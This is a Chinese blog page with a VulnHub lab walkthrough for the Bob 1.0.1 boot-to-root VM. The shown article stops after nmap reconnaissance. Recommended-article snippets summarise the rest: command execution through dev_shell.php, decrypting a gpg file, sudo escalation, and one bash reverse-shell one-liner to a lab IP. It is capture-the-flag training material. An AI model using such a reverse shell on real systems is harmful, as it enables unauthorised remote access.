靶机【B2R】Bob:1.0.1

最新推荐文章于 2024-10-09 17:51:09 发布
最新推荐文章于 2024-10-09 17:51:09 发布
阅读量1.2k 收藏 5
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42094992/article/details/108808561
版权

Bob:1.0.1

下载链接

https://download.vulnhub.com/bob/Bob_v1.0.1.ova

将靶机ova文件导入vmware中,更改网卡配置为桥接直接使用。

1.信息收集

根据已知靶机mac地址查询ip。

确定目标IP

Nmap -sP 192.168.43.0/24

端口扫描

Nmap 192.168.43.169 -A -p- -oN namp.A

C:\Users\ASUS>Nmap 192.168.43.169 -A -p- -oN nmap.A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-26 10:25 ?D1ú±ê×?ê±??
Nmap scan report for Milburg-High (192.168.43.169)
Host is up (0.00069s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     ProFTPD 1.3.5b
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
25468/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
|   2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
|   256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
|_  256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:4
最低0.47元/天 解锁文章
渗透入门之BOB靶机渗透实战
CongM_JueD的博客
09-03 945
渗透入门初体验
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2772
迟到的文章,就当库存发出来吧~
vulnhub之Bob_1.0.1
qq_45300786的博客
11-24 274
http://www.mamicode.com/info-detail-3079690.html https://www.jianshu.com/p/30165f430175?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation
【VulnHub靶机Bob: 1.0.1
最新发布
所有文章均免费阅读,大家一起学习
10-09 317
继续搜查,发现一个脚本文件,内容是输出一些语句,每行的首字母都是大写,将每一行的大写字母都提取出来 HARPOCRATES,这会不会就是刚刚加密文件的密码?在/home/bob/Documents目录下发现了一个login.txt.gpg文件,是个加密文件。在上面发现了一个old_passwdordfile.html的文件。靶机ip:192.168.233.130。发现开放的端口有80.25468。直接尝试一手sudo su。似乎是能够执行命令的。
VulnHub DepthB2R 靶机渗透
Shadow的博客
04-08 434
DepthB2R 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-08 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 主机ip为172.16.1.22 nmap -p- -A -T5 172.16.1.22 只开放了8080端口,我们看看是什么 二、web渗透 没什么发现,试试nikto扫描下 ni
vulnhub Bob: 1.0.1
箭雨镜屋
04-27 1630
渗透思路:nmap扫描----通过robots.txt得到/dev_shell目录----利用RCE得到反弹shell----找到.gpg文件密码并解密----sudo su提权
vulnhub靶场,Bob_v1.0.1
kukudeshuo的博客
08-27 1043
vulnhub靶场,Bob_v1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bob-101,226/ 攻击机:kali(192.168.109.128) 靶机Bob_v1.0.1(192.168.109.172) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP地址为192.168.109.172 使用nmap扫描查看目标靶机
Vulnhub靶机系列:ch4inrulz: 1.0.1
汗的博客
04-30 626
这次的靶机是vulnhub靶机:ch4inrulz: 1.0.1,还是在合天网安里做。 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权 靶机地址及相关描述 https://www.vulnhub.com/entry/ch4inrulz-101,247/ Frank has a small website and he is a smart developer wit...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
BOB1.0.1靶机渗透攻略.pdf
09-21
本篇文档详细介绍了针对名为 Bob 1.0.1 的靶机进行渗透攻击的实战攻略。靶机 Bob 1.0.1 可以在 VulnHub 上找到,这是一个提供实战环境的网站,允许用户下载靶场并进行渗透测试。 渗透攻击过程首先需要使用 Nmap ...
jangow-01-1.0.1
qq_46140711的博客
09-22 1228
jangow-01-1.0.1靶机练习
Vulnhub靶机Bob_v1.0.1 writeup
xingjinhao123的博客
02-18 3059
下载地址:https://www.vulnhub.com/entry/bob-101,226/ 信息搜集 扫描IP地址 扫描端口及端口信息 访问80端口并没有发现有用的信息 扫描目录 看到有熟悉的robots.txt,访问看一下 发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 getshell bash反弹shell bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 &
记:渗透测试-靶机训练Bob1.0.1
Anderlos
06-24 1027
前言 来CSDN划水有几年了,一直处于学习的状态,直到今天才发第一篇文章,就以基础渗透作为开篇吧,技术不到位还望大佬们手下留情,话不多说直接进入分享 首先请出靶机 靶机界面 然后进入kali(其实是为了分享一波桌面) 首先确定一点问题就是,我们需要知道对方IP地址是多少(因为是在虚拟机环境内所以注定IP地址不会太多,所以我们既已知在一个网段内,只需要扫描出这个网段的所有主机即可) ip addr 先通过ip addr来确认一下我们...
[B2R]Raven: 2靶机
weixin_43886198的博客
12-13 895
[B2R]Raven: 2 靶场地址 靶场信息 靶场描述 Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach R
Bob靶机攻击记录
m0_56375711的博客
08-13 374
bob靶机攻占记录~
靶机实战(Super-Mario-Host-v1.0.1)
weixin_45605313的博客
07-14 616
超级玛丽实验环境实验过程信息收集主机发现端口扫描服务发现目录扫描漏洞发现漏洞利用漏洞发现 实验环境 靶机:超级玛丽(Super-Mario-Host-v1.0.1) 测试机:kali(IP:192.168.186.128),win10 实验过程 信息收集 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 masscan -p
(VulnHub靶机通关)breach系列:breach-2.1细节通关方法
yang1234567898的博客
01-26 3704
靶机下载地址:https://download.vulnhub.com/breach/Breach-2_final2.1.zip 需要配置仅主机模式
BOB靶机渗透实战-----攻略(大神勿喷)
z2560088的博客
09-21 2100
准备工作 靶场 Bob: 1.0.1 ~ VulnHub 攻击工具kali虚拟机 直接双击打开即可添加到虚拟机。打开后网卡使用NAT模式。 没有给用户名和密码。(给了就没有攻击的必要了 hhh) 开始攻击 打开kali 使用nmap 扫描同网段下的ip和端口(因为靶机也用的NAT模式的网卡,所以按理说应该被分在了与kali虚拟机同网段的某一个ip地址) 我的kali ip 地址为192.168.160.129 nmap -sP 192.168.160.0/24 ...
B2R】DINA1.0.1
qq_44339430的博客
03-24 553
B2R】DINA:1.0.1 靶场地址:https://www.vulnhub.com/entry/dina-101,200/ 靶场信息 靶场描述 Description Back to the Top Welcome to Dina 1.0.1 ________ _________ \________\--------___ ___ ____----------/______
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值